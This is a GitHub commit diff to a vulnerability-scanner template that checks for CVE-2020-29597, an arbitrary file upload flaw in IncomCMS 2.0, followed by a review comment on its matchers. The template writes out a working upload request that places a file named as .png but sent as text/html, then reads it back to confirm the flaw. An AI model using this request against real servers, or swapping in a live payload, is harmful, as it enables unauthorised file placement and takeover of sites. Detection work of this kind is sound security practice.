Added strict matchers (#4589)

patch-1
Sandeep Singh 2022-06-15 05:03:00 +05:30 committed by GitHub
parent 17ec5b993a
commit 0b8fe245cd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 16 additions and 9 deletions


@ -1,4 +1,5 @@
id: CVE-2020-29597
info:
name: IncomCMS 2.0 - Arbitrary File Upload
author: princechaddha
@ -27,21 +28,27 @@ requests:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt
------WebKitFormBoundaryBEJZt0IK73M2mAbt
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.png"
Content-Type: image/png
Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.png"
Content-Type: text/html
{{randstr_2}}
------WebKitFormBoundaryBEJZt0IK73M2mAbt--
- |
GET /upload/userfiles/image/{{randstr}}.png HTTP/1.1
GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(body_1, '\"name\":\"{{randstr}}.png\"')
- status_code_2 == 200
condition: and
- type: word
part: body_1
words:
- '{"status":"1","name":"{{randstr_1}}.png"}'
- type: word
part: body_2
words:
- '{{randstr_2}}'
# Enhanced by CS 06/06/2022
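Review bot: The matcher set appears to drop the `status_code_2 == 200` condition (old and new lines are not marked on this page, so this assumes the two `word` matchers are the added side), leaving the `{{randstr_2}}` body match as the only evidence taken from the second response. Keeping a third matcher of `type: dsl` with `status_code_2 == 200` under the existing `matchers-condition: and` would confirm that the marker was read back from a successfully served file and not from an error or interstitial page. The `body_1` word is an exact JSON literal, `{"status":"1","name":"{{randstr_1}}.png"}`, so a vulnerable host that returns the same fields with different spacing or extra keys would be missed; matching only the `"name":"{{randstr_1}}.png"` pair is more tolerant. A comment above the upload request should also say that the part is deliberately sent as `text/html` under a `.png` name. Since no cleanup request is visible after the GET, the same comment should tell operators that the probe file stays on the scanned host.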